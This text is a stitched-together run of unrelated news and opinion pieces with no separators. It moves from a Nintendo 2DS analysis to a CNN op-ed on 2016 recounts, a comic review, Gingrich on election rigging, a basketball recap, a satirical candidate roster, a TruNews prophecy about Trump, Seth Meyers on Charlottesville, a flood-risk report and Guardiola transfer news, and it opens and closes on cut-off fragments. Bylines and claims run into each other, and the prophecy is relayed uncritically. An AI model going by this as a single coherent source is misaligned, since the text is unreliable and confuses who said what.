“ We are going to the United Nations to vote on the resolution of our becoming an observer state on the 29th of this month . Nothing will deter us , ” Abbas said .
On August 29 , 2013 by Jason Rechtman
We 're all used to seeing Nintendo make bizarre decisions , but the newly revealed Nintendo 2DS – a 2D-only variant of the 3DS – takes the cake . And just so happens to resemble a slice of cake when viewed from the side , too . Yesterday morning 's announcement of the cheaper , flatter , and 2D-er handheld came seemingly out of nowhere and was immediately panned by gamers across the Internet for its missing features , perplexing design , and even its mere existence . The 2DS certainly seems odd at first glance , but if you look at the history of the 3DS , this 2D variant turns out to be a logical move on Nintendo 's part . It addresses a variety of issues that have stunted potential 3DS growth here in the West ( where sales are half that of Japan even though our market is much larger ) , while also ensuring higher profits for Nintendo during a fiscal year in which they pledged to generate a lofty 100 billion yen profit . One could argue that in the same way many joked the Samsung Galaxy S3 was designed by the company 's legal team to prevent further lawsuits from Apple , Nintendo designed the 2DS specifically as a workaround for the issues the 3DS has faced .
In some ways , the biggest hindrance of the 3DS is its namesake : the stereoscopic 3D effect . It 's not an issue for everyone , but there are situations in which the mere existence of this feature has prevented system sales , most notably among parents of young children . Since before the launch of the 3DS , Nintendo has billed the 3D effect as a feature for ages 7 and up only . Even with the 3D Slider available as an option to let younger children turn off the effect , it 's hard to convince parents that it makes sense to spend $ 170 on a premium product centered around a feature their children should n't even use . Addressing this is a clear part of Nintendo 's 2DS strategy . Nintendo of America President Reggie Fils-Aime said as much to IGN , telling the site that the 3D age requirement “ creates an opportunity for five-year-olds , six-year-olds , that first-time handheld gaming consumer. ” It 's a way for Nintendo to revisit its old blue ocean strategy , in which they focused on potential customers who were not addressed by previous products . Similarly , there are many out there who simply do n't trust the 3D effect . While Nintendo claims it 's perfectly safe , reports from the 3DS 's early days of headaches , nausea , and potential eye damage have scared away some would-be buyers . The 2DS completely avoids such issues , providing an option in which those who are hesitant about 3D do not feel like their money is being wasted on a feature they 'll never use .
The ability to provide a non-3D alternative to the 3DS is the publicly presented reason for the 2DS , but if you look at the device itself , it 's clear Nintendo is also trying to address the ongoing brand confusion between DS and 3DS . To this day , many people still think the 3DS is just another iteration of the DS . To them , there was the DS , the DS Lite , the DSi , and now a DS that can output in 3D called the 3DS . They do n't fully realize that the 3DS is actually an entirely separate system , much like many people do not yet understand that the Wii U is actually the successor of the Wii . Part of the DS/3DS brand confusion comes from the naming , but a lot of it can also be attributed to how similar the 3DS and 3DS XL look to their previous DS counterparts . They all feature a clamshell design , two screens , a stylus , and some sort of matte or gloss finish depending on which version you choose . The 2DS completely bucks this trend with its slate design . There 's no clamshell and the disproportionate screens – one of the few visual differentiators of the 3DS – are now front and center . If a kid asks his mom for a 3DS , it 's easy to see how she could reply with a comment like , “ This looks just like your DSi , you do n't need it. ” With the 2DS , however , it 's immediately distinguishable as a separate device .
Creating an entirely new design for the 3DS also allows for Nintendo to maximize the system 's profitability while offering a cheaper price point . Removing the 3D effect obviously cuts down on costs , but as Nintendo of America VP of sales and marketing Scott Moffitt told GamesIndustry International , “ hinged clamshell design is also an issue ” when assessing manufacturing costs . Take it away and you save even more . Plus , moving away from a clamshell design lets Nintendo remove the extra cost of two separate screens . As reported by USgamer , the 2DS contains a single , giant screen that is divided in two by the plastic casing . Similar cost cutting measures were applied to the speaker , which is now mono instead of stereo ( although stereo and surround sound options are still available when headphones are plugged in ) . If the iPhone can get away with only one speaker , the 2DS can as well . All of this ensures that even when sold for less than its 3DS counterparts , the 2DS will still generate a healthy profit for Nintendo . A profit that is more crucial now than ever as Nintendo continues to recover from the 3DS 's weak initial sales , the ongoing Wii U sales struggle , and two years of annual operating losses .
Then there 's that cheaper price point . At $ 129.99 , the 2DS is $ 40 cheaper than the 3DS and $ 70 cheaper than the 3DS XL and PlayStation Vita . It also allows for Nintendo to finally phase out the original Nintendo DS entirely . For the past few years , the DS Lite and DSi acted as budget gaming machines . They were priced at or below $ 129.99 ; a price that the DS Lite 's success proved is mass-market friendly across all types of consumers . While Nintendo was happy to continue selling hardware , even if it was the dated DS , they simply could n't generate as much money off DS software sales . Few DS titles still retail for full price , and many of the late DS buyers chose to purchase used games to save even more . By bringing the 2DS out at this same $ 129.99 price point , Nintendo is able to transition these consumers to the 3DS ecosystem , where games still cost $ 39.99 ( even among older evergreen titles such as Mario Kart 7 and Super Mario 3D Land ) . In short , making the 2DS more affordable not only ensures better sales of the hardware , but also helps to build a larger user base that will continue to buy games well into the future . We will see this strategy in action with Pokémon X & Y , which will not coincidentally launch alongside the 2DS on October 12 . Parents may have felt it was too expensive to get a 3DS just so their kids could play the new Pokémon , but with this proven price point , Nintendo is able to practically guarantee additional sales of both the games and the hardware needed to play them .
For everything Nintendo did right with the 2DS , it still is n't perfect . One could argue that the clunky-looking design leans a little too heavily on the goal of attracting kids , especially in an era when sleek devices like iPod touches and iPads are being used by the exact same demographic . There 's also the 2DS name itself , which may result in the exact brand confusion that the system 's design specifically tried to avoid . When you examine the 2DS strategy as a whole , though , it 's clear that this is a system built to address the issues that have been holding back the 3DS . For gamers , the 3DS has been a great handheld with a huge selection of games . Now Nintendo needs to get those games into the hands of new customers , be it those who play only in 2D , parents who did n't understand the original 3DS , or those who simply thought the price was too high . After all , there 's a reason Nintendo did n't announce the 2DS in a fan-oriented Nintendo Direct and still has not tweeted about it with its @ NintendoAmerica accounts a full 17 hours after the announcement ( at the time of this writing ) . As Nintendo fans , we like to have our cake and eat it too , but the 2DS is a cake slice for someone else .
Joshua A. Douglas is a professor at the University of Kentucky College of Law who specializes in election law and voting rights . He is the co-editor of `` Election Law Stories . '' He contributed to and volunteered for the Hillary Clinton campaign . Follow him on Twitter @ JoshuaADouglas . The opinions expressed are his own .
( CNN ) Donald Trump 's baseless assertion that there were `` millions of people who voted illegally , '' and the Jill Stein-led recount in up to three states , both desecrate the beauty of our democracy , revered worldwide : that the winners humbly accept their victory and the losers graciously accept defeat .
There is absolutely no evidence of widespread voter fraud , much less that there were millions of illegal voters . It diminishes the office of the presidency for the president-elect to peddle these allegations . Although meaningless to the outcome , Trump lost the popular vote . Accusations of voter fraud or election tampering , with no evidence whatsoever , cause unnecessary frenzy and put the focus in a dangerous place : thinking we need to do something to cure election issues that do not exist .
Similarly , the recount in Wisconsin , Michigan , and Pennsylvania are harmful because they make people believe something was amiss , with no evidence in support and no chance of changing the result .
News that Green Party presidential candidate Jill Stein has requested a recount in Wisconsin , and will likely do the same in Michigan and Pennsylvania , has raised faint hopes among Hillary Clinton supporters that somehow Donald Trump will not become the next president of the United States .
Now that Clinton 's campaign has said it will participate in the recount efforts , those supporters ' hopes have been lifted even higher .
To put the matter bluntly : They should give up that hope .
There is essentially zero chance that the recounts in Wisconsin , Michigan , and Pennsylvania will change Trump 's lead , which number in the thousands , not hundreds , in all three states . Trump is winning Wisconsin by a little more than 27,000 votes ; his lead in Michigan sits at around 11,000 ; and his lead in Pennsylvania is insurmountable at over 68,000 .
This is not Florida 2000 . On Election Night in 2000 , George W. Bush held a 1,784 vote lead over Al Gore in Florida 's election for president , representing just 0.031 percent of the 5.8 million votes cast in the state . After a recount -- which the US Supreme Court halted by a 5-4 vote -- Bush ultimately won Florida by 537 votes , securing the presidency . Yet even if the Court had allowed the recount to proceed , the margin would not have swung by much
This is not Washington 2004 , where a recount reversed the result , handing Democrat Christine Gregoire a 129-vote win over Republican Dino Rossi after he initially had a 261-vote lead on election night .
This is not Minnesota 2008 , where a recount gave Democrat Al Franken a 225-vote win over Republican Norm Coleman , reversing Coleman 's initial lead of 215 votes .
All of these recounts had one significant fact in common : the margin of victory was in the hundreds , not thousands . And the shifts in vote totals after the recounts were very small .
In the past 15 years , a statewide recount has reversed the winner from the election-night tally only three times -- in the Washington 2004 governor 's race ( a 390-vote shift ) , the 2008 Minnesota US Senate race ( a 440-vote shift ) , and a 2006 election in Vermont for Auditor of Accounts , which initially had a 137-vote margin on election night that changed to a 102-vote win for the other candidate after the recount ( a 239-vote change ) .
FairVote , a nonpartisan organization that advocates for electoral reform , found that from 2000-2012 there were only 22 statewide recounts across the country , and the average shift in those recounts was just 0.026 %
But , a Clinton supporter might say , what if the machines were hacked ? What if the election was actually rigged ? It is an ironic sentiment given that Trump was the one claiming widespread election rigging before the election and Clinton supporters blasted Trump for refusing to say whether he would honor the results .
Irony aside , there is simply no evidence of election hacking , as Clinton 's top lawyer , Marc Elias , himself conceded . Of course , now that Stein has begun the process , it is perfectly reasonable for Clinton and her lawyers to stay involved . But her supporters should not take that fact as a sign that the election is still in question .
Prolonging the campaign by seeking a recount breeds unwarranted doubt about the legitimacy of our elections — without any real evidence to back it up . Our democratic system relies on everyone accepting the result . That legitimacy suffers when mere speculation calls the result into question with little evidence of rigging and Electoral College vote totals that decisively determine a winner .
Moreover , all of this talk of recounts and election rigging obscures the more important fact about our elections : We impose too many obstacles on voters for no good reason . We need to work harder to eliminate onerous voting laws and make voting easier , not focus on long-shot recounts that provide only false hope . For instance , this recount effort does nothing to address issues surrounding Wisconsin 's controversial voter ID statute , which improperly prevented some people from voting .
While Stein 's futile recount effort should give no solace to Clinton supporters , there is a silver lining to the current debate : It might finally prompt Congress and state legislatures to devote greater resources to election technology .
We desperately need better voting equipment and stronger post-Election Day audits . Going into this election , experts warned about the woefully out-of-date equipment that most states use . Indeed , old machines -- especially if they do not allow for a paper trail -- raise the possibility , however small , of election hacking . Old machines can lead to long lines , lost votes , and other Election Day problems .
Updated voting technology can increase turnout by making voting easier . As just one example , Doña Ana County , New Mexico uses Voting Convenience Centers instead of precinct-based polling places , meaning that anyone in the county can vote at any of the 40 centers instead of having to go to their assigned home precinct . This makes it easier to vote near work or school and eliminates the possibility of having to vote via a provisional ballot -- which could potentially not count -- if a voter shows up at the wrong place .
This system shows that improved technology can both enhance the integrity of our election system -- a standard Republican talking point -- and also make voting more accessible to more people , thereby increasing the electorate -- something Democrats usually strive to achieve .
Follow CNN Opinion Join us on Twitter and Facebook
The recounts in Wisconsin , Michigan , and Pennsylvania will do nothing to assuage the fears of Clinton supporters who recoil at the thought of a Trump presidency . Trump 's dangerous allegation that there were millions of illegal voters similarly does nothing but stir up unnecessary controversy at a time when he should be working to bring the country together .
At a minimum , these activities should force politicians on all sides to re-examine how we run our elections . Like it or not , Donald Trump will become our next president . Hopefully , when he runs for re-election in four years , we will have a stronger election system that makes voting easier , more convenient and accessible , less susceptible to manipulation , and more easily verifiable . That 's the closest to a `` win '' that Clinton and her supporters can expect .
We Stand On Guard # 6
Image Comics
Written by : Brian K Vaughn
Art by : Steven Skroce
Color by : Matt Hollingsworth
We Stand on Guard has been one intense issue after another . Each one inching us closer to this inevitable conclusion . Canada 's moment to turn the tides in the great war against America has finally arrived and as a born and bred American I have never found myself routing harder for Canada . In one last desperate attempt Amber and her band of Canadian rebels use everything at their disposal to try and change the course of the war forever . Amber stands with her hand on the trigger ( literally ) as we anxiously await to see if she pulls it , while “ The American ” tries to convince her otherwise . As these two debate the merits of war and try to destroy each other , the Canadian rebels are broadcasting their incursion for all to see .
Vaughn builds the tension perfectly as Amber and the American stand toe to toe . Issue 6 continues to do what every issue has done before it and that 's entice the reader with edge of your seat action and suspense . No matter your country of origin , Vaughn masterfully tells the Canadian story so you sympathize without question . Even when “ The American ” does all she can to convince you and Amber otherwise , you dismiss it almost as fast and viciously has she does . It is impossible not to sympathize with Amber and her story and Vaughn ends it in the most satisfying fashion .
We Stand on Guard # 6 is about as beautiful as a comic can get . Steven Skroce 's art is perfectly rendered and full of life bringing the action , blood and horrific atrocities of war front and center and impossible to avoid . Skroce 's clear and concise pencil work explodes off the page with the addition of Matt Hollingsworth 's colors . In the final climatic scene these two work in wonderful harmony to create a disaster-piece that is a visual feast of orange , yellow and white .
We Stand on Guard # 6 serves as a satisfying ending to a wonderfully unique revenge story . Vaughn does such a great job at making you feel for the characters and their cause , that by the final page of this issue you will stand at full attention , with a single tear running down you cheek , proudly signing “ O Canada . ”
Former Speaker Newt Gingrich ( R-Ga. ) , a top Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe : report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort 's attorneys say he should get less than 10 years in prison MORE adviser , on Sunday said media outlets have “ rigged ” the presidential election against the Republican presidential nominee and called on voters to monitor election sites .
ADVERTISEMENT
“ Without the unending , one-sided assault of the news media , Trump would be beating [ Democratic nominee ] Hillary Clinton Hillary Diane Rodham ClintonSanders : ' I fully expect ' fair treatment by DNC in 2020 after 'not quite even handed ' 2016 primary Sanders : 'Damn right ' I 'll make the large corporations pay 'fair share of taxes ' Former Sanders campaign spokesman : Clinton staff are 'biggest a -- holes in American politics ' MORE by 15 points , '' Gingrich said in an interview with ABC 's “ This Week . ”
“ So to suggest to us that people who are concerned about honest elections are somehow nutty , I think is a mistake , ” he said , adding that he does n't believe the elections are being rigged “ at the precinct level . ”
Gingrich , however , did argue in favor of Trump 's proposal that voters monitor polling places so that this election is n't “ stolen . ''
`` I remember when Richard Nixon had the election stolen in 1960 , and no serious historian doubts that Illinois and Texas were stolen . So to suggest that , we have , you do n't have theft in Philadelphia is to deny reality , '' the former Speaker said .
LONG BEACH , Calif. -- Devin Hudson scored 14 points , hauled in 12 rebounds and sank the game-winning bucket in overtime Saturday to lift Long Beach State to a 58-56 upset win in overtime over No . 18 California .
Long Beach State ( 8-1 ) used a 21-0 run midway through the first half to build a lead that California ( 7-2 ) whittled down in the second . The Bears forced overtime on a Brittany Boyd jump shot that tied the game at 50 at the end of regulation , and she tied the game again at 56 in overtime before Hudson hit the game-winner at the other end with 3 seconds to go .
Boyd , who finished 21 points and 15 rebounds for California , hit a final bucket in overtime but did n't get it away before the buzzer . California played most of the game without leading scorer Reshanda Gray , who was ejected early in the first period for an intentional foul .
The 2016 presidential primary season is finally upon us . Let 's familiarize ourselves with the cast of characters .
It 's finally here , the moment you 've been waiting for with fear and dread . You may not want to care about the 2016 presidential primary season , but it cares about you . And what a menagerie we have with us for this cycle – a collection of personalities who are all making big moves toward entering the race or at least trying to convince speech schedulers that they just might . The National Journal ranking of candidates is here , and it 's fine as far as it goes . But if we 're going to be talking about all of this for two years , we might as well have a bit more fun with our cast of characters . And who are these characters ?
Jeb Bush as : Bigfinger – Imagine someone who is often underrated because of their low birth , a figure most comfortable in the shadows , subtle , conniving , manipulative , devious , and above all invisible operator . Then imagine the opposite of that , and you have Jeb Bush , who seems very , very serious about running for president , and is as of today the likeliest nominee for a party which still retains significant affection for the Bush family . His advantage with the money set is already well evident – he 's beginning his exploratory PAC fundraising in earnest this week in Greenwich . Everything Jeb Bush does will be overanalyzed and blown out of proportion , and he has the singular challenge this cycle of defending not just his own record but his father 's and brother 's as well . But he 's still the odds-on favorite to win .
Chris Christie as : Stratton Oakmont – Stability . Integrity . Pride . Or brashness and boldness without all that much to back it up . And come on , you do n't get more “ Jonah Hill over-enunciating Steve Madden ” than this clip from last night in Dallas , which I could watch forever . His brother even supplied a slogan for the campaign after the predictable social media reaction : telling America to “ get a life ” . Chris Christie 's act was enormously popular even among conservatives prior to the 2012 cycle , but his performance at the GOP convention , in the wake of the Sandy storm , and a couple of policy Achilles heels ( accepting Obamacare , a litany of bad judicial appointments ) make the path to a nomination he clearly wants rougher . But he 's also spent the past few years building up as many favors as possible – he 'll be crisscrossing the country in the next month attending the swearing in of a slew of GOP governors he helped elect . How he deploys those favors will be key , but he may find himself more popular in the Dallas Cowboys ' box than on the stump .
Ted Cruz as : Sonny Corleone – Charismatic and courageous and popular as hell among the people who love him , and everyone assumed he 'd be running the conservative movement a few short years ago . If only he 'd had an EZ Pass to get through the shutdown unfazed , he 'd be running away with this thing . But the money mostly views him as an incredibly dangerous hothead who 'll run the party into the ground . And with the staff turnovers in Cruz-land of late , he may yet lack the wartime consigliere he needs . But do not under any circumstances underestimate his ability to win an argument with the base , and he will not hesitate to go to the mattresses if he deems it necessary .
Marco Rubio as : Robert Griffin III – A naturally gifted prospect , but one whose presidential aspirations have taken a series of unexpected and self-inflicted hits . Look at him from one perspective , and he looks like a once-a-generation ca n't miss athletic freak , a blue chipper if there ever was one . Look at him from another perspective , and you wonder what anyone else ever saw . One minute he 's Fran Tarkenton , the next he 's Todd Marinovich . His legislative effort on immigration gives him a great opportunity , if he wants to use it , but also could prove to be a crippling liability . He 's got rabbit ears for criticism , but he 's also very social media and pop culture savvy . Babies smile when they look at that face , but they also do n't vote .
Rand Paul as : Boromir – Already used to being surrounded by foes , he 's the loudest voice at the Council of Elrond for turning the enemy 's weaponry into an advantage . If put into practice , this strategy could turn out to be a genius move or ( if you listen to some people ) it could be an epic failure , an example of temptation toward an easy path to victory which blows up in your face . His case for 2016 is likely to be troubled by paternal loyalties to a guy who may light himself on fire at a moment 's notice based on something he sees in a shiny object . May have a moment or two of glory early on , but will need to survive a hail of arrows if he 's going to make it to the climax .
Scott Walker as : Kirkland Farms – The mysterious supplier of all things Costco , Kirkland has something for everybody . Would you like a bag of almonds the size of a modest labrador ? Kirkland makes that . Have you recently spawned quadruplets and want to only buy one package of baby wipes for the coming year ? Kirkland makes that , too . Would you like to purchase vodka , an expandable roller bag , ground coffee beans , an orthopedic pet bed ( square or round ? ) , a 72 pound 24-month aged wheel of parmesan cheese , and a pair of pleated charcoal wool gabardine trousers , but would prefer these items all originate from the same nondescript Middle American-ish brand ? Kirkland delivers . It 's a miraculous accomplishment in the modern global economy ! But does anyone , when they 're picking these things , say “ I 'd prefer we got the Kirkland steak seasoning ” , or is it just an afterthought ? Herein lies Scott Walker 's problem .
Bobby Jindal as : Q – The Louisiana governor may turn out to be the head of R & D for the right for the 2016 cycle , with the inventive approach to policy everyone will be responding to out of this field . He has the strongest ability to self-staff out of this bunch , and he 's likely to be a strong debater . What remains to be seen is whether he has the ability to connect on the trail in ways that make him more than everyone 's guy to fix that health care mess . Republicans may not love to refer to themselves as “ nerds ” or “ wonks ” as much as Democrats , but are they ready for the actual real life example to be their presidential candidate ? Whether the Ivy Leaguer 's Southern fried populism sells in a crowded field will be the real test here .
Rick Perry as : Rooster Cogburn – When he arrived on the national scene in 2012 , conservatives swooned for Rick Perry as if he was The Man From Snowy River , but he ended up looking like he stepped off the set for The Shakiest Gun in the West . We know him better now , both for his “ shoot first think later ” flaws and for his occasionally canny moves ( but it 's telling that the latter seem to surprise folks ) . Perry has a very different network of people around him these days , and seems to be making moves to expand his support in different factions on the right , beyond his conservative supporters . This will have to be a risk-taking candidacy if it 's going to make noise , and Perry 's political golden days may have passed him by . In debates , he has no margin for error . But when he 's on , he still has the best weapon in a political cast light on retail experience : he 's great on the trail .
John Kasich as : Chevy Chase – So back in 1977 , Chevy Chase leaves SNL to become a big hit in movies , which was just fine with most of the castmembers considering how much they hated working with the guy . His replacement : a youngster named Bill Murray , who almost immediately had to hear about how he was n't up to snuff . When Chevy came back to guest host the show – well , this happened . “ After a whole week of snippy remarks and perceived snubs between the two , Murray and Chase came to blow minutes before recording began . As recounted in the book Live From New York , Chase compared Murray 's acne-marked face to the surface of the moon ; Murray in turn implied that Chase was incapable of satisfying his wife in bed . After the pair were pulled apart by fellow cast members , a ‘ foaming at the mouth ' Murray delivered what could be the most perfect put-down of all time : ‘ Medium talent ! ' ” And that 's what John Kasich is .
And that 's not all . We 've got Mike Huckabee as : Sister Aimee Semple McPherson , Rick Santorum as : Frank Grimes , Ben Carson as : Scrubs , Carly Fiorina as : The Baroness , Jim Webb as : Little Face , Joe Biden as : Cousin Eddie , and Hillary Clinton as : Lucille Bluth .
Welcome to Thunderdome 2016 : Dozens enter , just one leaves .
With the Republican nomination all but officially his , Donald Trump 's rise to power is the subject of significant speculation .
Some say he 's a modern-day Cyrus ; others compare him to Nebuchadnezzar .
Now , firefighter Mark Taylor tells TruNews ' Rick Wiles that Trump was ordained for such a time as this .
`` The Spirit of God says , ' I have chosen this man , Donald Trump , for such a time as this . For as Benjamin Netanyahu is to Israel , so shall this man be to the United States of America ! For I will use this man to bring honor , respect and restoration to America . America will be respected once again as the most powerful and prosperous nation on Earth , ( other than Israel ) . The dollar will be the strongest it has ever been in the history of the United States , and will once again be the currency by which all others are judged , ' '' Taylor says the Lord told him five years ago .
So what does this mean for today ? Watch the video to see .
Get Spirit-filled content delivered right to your inbox ! Click here to subscribe to our newsletter .
Great Resources to help you excel in 2019 ! # 1 John Eckhardt 's `` Prayers That ... '' 6-Book Bundle . Prayer helps you overcome anything life throws at you . Get a FREE Bonus with this bundle . # 2 Learn to walk in the fullness of your purpose and destiny by living each day with Holy Spirit . Buy a set of Life in the Spirit , get a second set FREE .
See an error in this article ? Send us a correction
Stephen Colbert called it the “ seventh circle of hell. ” Jimmy Kimmel called for President Donald Trump 's immediate removal from office . And on Wednesday evening , Late Night host Seth Meyers offered his unvarnished opinion on Trump 's off-the-rails Charlottesville press conference during his latest edition of “ A Closer Look . ”
To paraphrase the late NFL coach Dennis Green , “ Donald Trump is who we thought he was . ”
During the Tuesday presser—an event that was supposed to be dedicated to infrastructure but instead featured the president 's angry , passionate defense of the neo-Nazis who marched on ( and incited violence in ) Charlottesville—Trump stated :
“ You had many people in that group other than neo-Nazis and white nationalists , OK ? And the press has treated them absolutely unfairly , ” he said , later adding , “ You had some very bad people in that group , but you also had people that were very fine people—on both sides . ”
Meyers could not believe what he was hearing . “ No ! There are no fine people marching with Nazis and white supremacists , ” he said . “ Nobody gets accidentally caught up in a white supremacist rally . It just does n't happen—except for that one time on Seinfeld . ”
The late-night host played a video clip featuring hundreds of tiki torch-wielding Charlottesville white supremacists chanting : “ Jews will not replace us ” and “ blood and soil . ”
Now , seeing as there are fewer than 7 million Jews in America ( out of 327 million people ) , it seems more than a bit silly for those who call themselves the “ master race ” to be afraid of such a small minority . As far as “ blood and soil ” goes , well , it 's an integral part of Nazi ideology that placed undue emphasis on racial stock and territorial history .
But look , according to Trump , the Charlottesville neo-Nazis “ had a permit ” and “ the other group did n't have a permit , ” so that somehow grants them the moral high ground .
“ Oh , the Nazis had a permit ? Well , fuck me , I 'm sorry ! I had no idea ! ” exclaimed Meyers . “ Also , of course they had a permit—they 're Nazis . Nazis ' main thing is having your papers . That 's like the one thing they 're good at . ”
Meyers concluded by posing the question on the minds of many Americans :
“ So , is Donald Trump a racist ? I 'll let you decide yes for yourself . But Trump is n't just a racist , he 's also a narcissist . He defends the white nationalist movement both because he 's racist and because they show up and chant his name and show him love , and his brain disease makes it impossible for him to denounce anyone who supports him . What Tuesday showed is that Donald Trump will never change . He showed us again who he really is : a lying racist who 's desperate for praise . ”
A river makes an unpredictable neighbor , as the last few months have reminded .
And now , some people are using the high waters from North Dakota to New Orleans to revisit longstanding questions about whether the very government programs designed to safeguard people from floods , including protective measures like dams and levees and recovery programs like flood insurance and disaster assistance , actually encourage them to take unnecessary chances .
“ Most people do n't understand what flood risk is , ” said Gerry Galloway , a civil engineering professor at the University of Maryland who has written extensively about his concerns . “ They assume that if there is some level of protection like a levee or an upstream dam , they 're safe . As a general rule , public officials do n't like to dissuade them of that fact . ”
Even those public officials can sometimes fall victim themselves .
As governor of South Dakota , Mike Rounds visited many flooded communities over his two terms . But when he left office this year , he moved into a house in Pierre , the state capital , right on the Missouri River . He was forced to evacuate just months later .
Like many residents in the state , he believes the flood is largely the result of mismanagement by the Army Corps of Engineers , which operates the dams . ( The corps said the releases were forced by unprecedented snow and rains . )
“ If I had to do it all over , I 'd still purchase the same lot , ” Mr. Rounds said . “ I really do think it 's an aberration . ”
Most of the major cities of the region — including Sioux City , just across the way in Iowa , a few miles east of Dakota Dunes — were settled on riverbanks . But even as many experts warn that climate change is increasing the frequency and severity of flooding and other natural disasters , developers continue to build homes in flood-prone areas .
“ Older communities , when they were being settled , learned through trial and error where to build — that 's why Sioux City is established on higher ground , ” said Paul Eckert , the city manager . “ It 's only in recent decades that you 've seen development in the lower areas like the Dunes . ”
Advertisement Continue reading the main story
Some of that development reflects either a calculated gamble or general confusion over federal estimates of areas with higher flood risk , based on maps produced by the corps that are in the process of being revised .
Many people in these higher-risk areas mistakenly believed that a flood could not happen more than once a century — the areas are called hundred-year flood zones , based on the calculation of an annual 1 percent chance of flood . Those outside often falsely believe that they are not at risk , even though they account for about a quarter of all flood insurance claims .
Newsletter Sign Up Continue reading the main story Please verify you 're not a robot by clicking the box . Invalid email address . Please re-enter . You must select a newsletter to subscribe to . Sign Up You will receive emails containing news content , updates and promotions from The New York Times . You may opt out at any time . You agree to receive occasional updates and special offers for The New York Times 's products and services . Thank you for subscribing . An error has occurred . Please try again later . View all New York Times newsletters .
But as the trailers , hot tubs and decks that have bobbed down waterways in recent weeks suggest , there is also an element of willful disbelief behind the decision to move close to rivers .
The Dakota Dunes used the twin attractions of river views and low taxes to attract wealthy professionals from the three-state Sioux City metro area .
The plot of land that had been home to about 10 people is now home to 2,600 people and 1,100 houses , which start at $ 175,000 — luxurious by the standards of this agricultural and industrial area .
Though developers initially urged residents to get insurance , they noted that the Missouri had been successfully controlled since the dam system was built .
After about a decade , concerns about the less predictable Big Sioux prompted the construction of a levee , which led the government to reduce the flood risk for another 160 lots — removing the flood insurance requirement and making them easier to sell .
As the years passed , those who dismissed a flood as unlikely started talking about it almost as an impossibility . Most residents dropped their flood insurance ; only 172 homes in the entire county now carry it , backing studies that found that homeowners typically dropped the insurance after several dry years .
Even when the Corps of Engineers began saying record snow and rain would force unprecedented water releases from reservoirs for most of the summer , some residents considered the warnings overstated . A few homeowners refused at first to allow construction of levees on their property this spring — and were later forced to pay to have their own barriers built .
Advertisement Continue reading the main story
The community has spent $ 10 million to $ 15 million so far on the flood fight , most of which came from a no-interest loan from the state . It is also trying to get the federal government pay for 75 percent of the costs and the state government pay for 10 percent .
Down the road at Riv-R-Land Estates , Tom Koob looked at the rows of houses protruding from the widened river . Upset that more money and effort was focused on protecting the much larger and wealthier Dakota Dunes , Mr. Koob said he hoped for federal support to rebuild .
“ I do n't want it to seem like we 're looking for a handout , ” he said . “ Since we did n't get the support that some of the other communities got on the front end , it would be nice to get some support on the back end . ”
Even as the evacuation extends into a third month , many residents say they have no concerns about returning to their homes . State officials say that may happen as soon as next month , when water releases are expected to be scaled back .
“ Absolutely we 're going to stay , ” Tim Boyle said as he stood in his emptied house .
He detailed some of the charms of river life : the bald eagles nesting on the cottonwood trees , the boat rides searching for catfish and walleye , and the summer parties on the dunes out front . And no , he was not worried about another flood .
Pep Guardiola admits that Real Madrid defender Danilo is one of a number of players that Manchester City are interested in , but denied that an agreement has been reached .
The City boss wants to add at least three new full-backs to the club and has already signed England international Kyle Walker in a deal that could reach £50 million .
Reports from Italy claim that a £26.5m transfer fee for Danilo has been agreed , but Guardiola denied that a deal is in place for the 26-year-old .
`` I said he 's a player for Real Madrid , so we are talking with three or four players who have not joined us , we need that to refresh the players and rebuild a little bit more the club , '' Guardiola told a news conference ahead of City 's International Champions Cup game with Manchester United in Houston on Wednesday .
City missed out on Dani Alves , who opted to move to Paris Saint-Germain instead after leaving Juventus on a free transfer , and Guardiola wants a second right-back after Pablo Zabaleta and Bacary Sagna left the club for free this summer .
Danilo is currently in Los Angeles with Real ahead ahead of their International Champions Cup match with Manchester United on Sunday . Real will then play City on July 26 .
Danilo is one of a number of players Manchester City are looking at , says Pep Guardiola .
Chelsea have also been linked a move for the Brazil international , who joined Real from Porto in a €31.5m deal from FC Porto two years ago .
City are also chasing Monaco 's Benjamin Mendy , with sources saying that a deal with the Ligue 1 champions is close to being reached .
Guardiola said : `` It 's like the case of Danilo , we have targets and we are going to see what happens . He 's a Monaco player so I have to try and be quiet . ''
Arsenal striker Alexis Sanchez is another player that City have been heavily linked with this summer . The Chilean international is entering the final year of his contract but Gunners boss Arsene Wenger insists he is not for sale .
Guardiola refused to deny the speculation but said that UEFA should consider shutting the transfer window before the seson starts .
`` Alexis is a player from Arsenal . Arsene said that , it 's because he knows more than me . Unfortunately the market finishes the 31st , I think that 's a huge mistake from UEFA , '' Guardiola said .
`` I think the market should finish when we start the season , it 's too long , too large . We are playing here with guys who maybe will not continue , or with players who are coming but are not here .
`` We are playing in a situation where we do n't know exactly what is going to happen for the rest of the season , so we miss time .
`` For all the managers . Hopefully in the future UEFA can think about that and the deadline will be the day we start the competition . And for the players I 've said the players are of other teams so I can not say too much . I do n't like when the other team 's managers talk about our players so for us it 's the same . ''
Guardiola appeared to rule out a move for Napoli goalkeeper Pepe Reina and insisted Claudio Bravo will remain despite an error-prone first season .
Star turn Sergio Aguero is another staying at the Etihad Stadium , with Premier League champions Chelsea reported to be keen to bring in the Argentina striker .
`` You know my opinion on Sergio , '' Guardiola said .
`` I said many times last season and I do n't change absolutely any words about what I said .
`` He 's our player , he will remain here . ''
One striker that is heading for the exit door is Kelechi Iheanacho , staying in the UK as a move to Leicester edges ever closer .
Wilfried Bony , who spent last season at Stoke , also looks to be on his way out , but Guardiola insists the only reason he is absent from City 's American tour is due to injury .
`` It was/is an honour to work with him because it was not easy for him because I did not give him a little opportunity , '' the City boss said of Iheanacho . `` His behaviour , I 've never sawed a guy like him ( before ) .
`` He is close to making a deal , a transfer and he decided to stay in Manchester . Maybe next week or the next 10 days he is going to finish .
`` We have an option to have the opportunity in a few years to bring him back .
`` But he 's a young player and we believe he deserves to play . He needs to play at that age and that 's why him , the club and everybody , we decide what 's best for him .
`` Bony is injured . If he was n't injured , he would be here but he had a little problem . It 's nothing important and serious , but he is recovering in Manchester . ''
Press Association contributed to this report .
Jonathan is ESPN FC 's Manchester City correspondent . Follow him on Twitter : @ jonnysmiffy .
SEOUL , May 12 ( Yonhap ) — South Korea will dispatch a veteran politician with close ties with President Moon Jae-in to join a key Chinese government forum to be held in Beijing next week , the presidential office said Friday , heralding a possible recovery of the bilateral relations marred by the deployment of an American-built defense system here .
